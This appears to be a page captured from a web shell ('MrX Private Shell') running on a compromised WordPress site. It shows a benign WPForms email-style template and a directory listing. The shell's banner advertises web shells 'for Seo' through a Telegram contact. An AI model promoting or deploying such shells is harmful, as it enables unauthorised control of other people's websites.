__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/**
* Tech style template.
*
* This template can be overridden by copying it to yourtheme/wpforms/emails/tech-style.php.
*
* @since 1.8.5
*
* @var string $email_background_color Background color for the email.
* @var string $email_body_color Background color for the email content body.
* @var string $email_text_color Text color for the email content.
* @var string $email_links_color Color for links in the email content.
* @var string $email_typography Preferred typography font-family for email content.
* @var string $header_image_max_width Maximum width for the header image.
* @var string $header_image_max_height Maximum height for the header image.
*/
if ( ! defined( 'ABSPATH' ) ) {
exit;
}
require WPFORMS_PLUGIN_DIR . '/assets/pro/css/emails/tech.min.css';
// Reuse border-color.
$border_color = wpforms_generate_contrasting_color( $email_text_color, 86, 72 );
?>
body, .body {
background-color: <?php echo sanitize_hex_color( $email_background_color ); ?>;
}
.wrapper-inner {
background-color: <?php echo sanitize_hex_color( $email_body_color ); ?>;
}
.header {
border-bottom: 1px solid <?php echo sanitize_hex_color( $border_color ); ?>;
}
body, table.body, h1, h2, h3, h4, h5, h6, p, td, th, a {
color: <?php echo sanitize_hex_color( $email_text_color ); ?>;
font-family: <?php echo esc_attr( $email_typography ); ?>;
}
a, a:visited,
a:hover, a:active,
h1 a, h1 a:visited,
h2 a, h2 a:visited,
h3 a, h3 a:visited,
h4 a, h4 a:visited,
h5 a, h5 a:visited,
h6 a, h6 a:visited {
color: <?php echo sanitize_hex_color( $email_links_color ); ?>;
}
.button-link {
background-color: <?php echo sanitize_hex_color( $email_links_color ); ?>;
border: 1px solid <?php echo sanitize_hex_color( $email_links_color ); ?>;
color: <?php echo sanitize_hex_color( $email_body_color ); ?>;
}
.footer, table.wpforms-order-summary-preview td {
border-top: 1px solid <?php echo sanitize_hex_color( $border_color ); ?>;
}
.footer, .footer a {
color: <?php echo sanitize_hex_color( wpforms_generate_contrasting_color( $email_text_color, 50, 45 ) ); ?>;
}
table.wpforms-order-summary-preview {
border: 1px solid <?php echo sanitize_hex_color( $border_color ); ?>;
}
<?php if ( ! empty( $header_image_max_width ) && ! empty( $header_image_max_height ) ) : ?>
.header-image {
max-width: <?php echo esc_attr( $header_image_max_width ); ?>px;
}
.header-image img {
max-height: <?php echo esc_attr( $header_image_max_height ); ?>px;
}
<?php endif; ?>
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| elegant-body.php | File | 400 B | 0640 |
|
| elegant-field.php | File | 316 B | 0640 |
|
| elegant-footer.php | File | 1.17 KB | 0640 |
|
| elegant-header.php | File | 2.59 KB | 0640 |
|
| elegant-queries.php | File | 3.32 KB | 0640 |
|
| elegant-style.php | File | 2.65 KB | 0640 |
|
| modern-body.php | File | 398 B | 0640 |
|
| modern-field.php | File | 314 B | 0640 |
|
| modern-footer.php | File | 1.16 KB | 0640 |
|
| modern-header.php | File | 2.54 KB | 0640 |
|
| modern-queries.php | File | 2.97 KB | 0640 |
|
| modern-style.php | File | 2.36 KB | 0640 |
|
| summary-header-plain.php | File | 998 B | 0640 |
|
| summary-header.php | File | 4.01 KB | 0640 |
|
| summary-queries.php | File | 591 B | 0640 |
|
| summary-style.php | File | 630 B | 0640 |
|
| tech-body.php | File | 394 B | 0640 |
|
| tech-field.php | File | 310 B | 0640 |
|
| tech-footer.php | File | 1.15 KB | 0640 |
|
| tech-header.php | File | 2.56 KB | 0640 |
|
| tech-queries.php | File | 3.08 KB | 0640 |
|
| tech-style.php | File | 2.45 KB | 0640 |
|